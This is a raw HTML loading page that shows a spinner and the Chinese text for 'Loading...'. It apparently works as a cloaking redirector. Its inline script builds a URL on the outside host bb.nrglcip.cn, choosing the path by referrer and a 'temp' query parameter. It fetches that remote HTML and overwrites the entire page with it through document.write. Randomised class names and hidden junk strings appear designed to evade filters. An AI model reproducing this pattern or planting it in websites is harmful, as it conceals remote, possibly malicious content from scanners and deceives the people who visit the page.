<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .fKAp95KJc {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .fKAp95KJc .eHQ1Z5dZIoF {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .fKAp95KJc .content {
            line-height: 50px;
            text-align: center
        }

        .fKAp95KJc .img {
            width: 100%
        }

        .fKAp95KJc .vpsK8LCIcD {
            text-align: center
        }

        .fKAp95KJc .vpsK8LCIcD span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .fKAp95KJc .vpsK8LCIcD span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .fKAp95KJc .vpsK8LCIcD span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .fKAp95KJc .vpsK8LCIcD span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .fKAp95KJc .vpsK8LCIcD span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .fKAp95KJc .vpsK8LCIcD span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .fKAp95KJc .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Y31uYOo04zQKZ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var kNnO5 = Y31uYOo04zQKZ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ kNnO5 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ kNnO5 +".html?a=share";
		}
		
        OjyMnD3=url+"#"+new Date().getTime();
        OjyMnD3 && function() {
            $.get(OjyMnD3, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >HvSFDIizIfJa59ux2bLgVAYiiBkf4CZxO14YUbMT9HR</ul>
<h1 style='display:none' >T1krjOu5p4ZF5</h1>
<b style='display:none' >ztRfmYhFNZt6Py6WdVaY9hFrcX6bE6766blvmHQxv41QGmRJlE3VmW9BZ2Q6wL</b>
<span style='display:none'>SfqtgrGQt9y1kbwDviCcp0gg2uTwgqqiBw90oaMp6zcJ</span><div class="fKAp95KJc">
    <div class="eHQ1Z5dZIoF">
        <div class="vpsK8LCIcD">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<span style='display:none'>KESFI1CgCPRvpLIU4OImonwojjtJq9ZRVNzmqvUFJ3nqe9BIf4BfGH81JmLkZY8NQ3S6mgsLj772haf71yUIBlYSpdO</span>
<h1 style='display:none' >FgSxLRlheloI3XgnObhdXr3VogeKeZ5y98PNLXk4Dk5z</h1>
<h1 style='display:none' >FgSxLRlheloI3XgnObhdXr3VogeKeZ5y98PNLXk4Dk5z</h1>
<li style='display:none' >XpUuDMjp6YlotmNNB9h2Cfg8GGCfJC8LUYIz9QJSEkPZWaoG5tmytedSfQhteOQ24xfax5lHbCqt</li>
<b style='display:none' >zrd9nP4Hv4PyXxSuUkthRoJik0rZ2418cpb1MHhstnfjfPgqcAg6LXsjsnJIUBb</b>
<ul style='display:none' >OecS0QWKl4X9hPk2y5HfQyjJvbwGGAzH355</ul>
<img  src='' style='display:none'></body>
</html>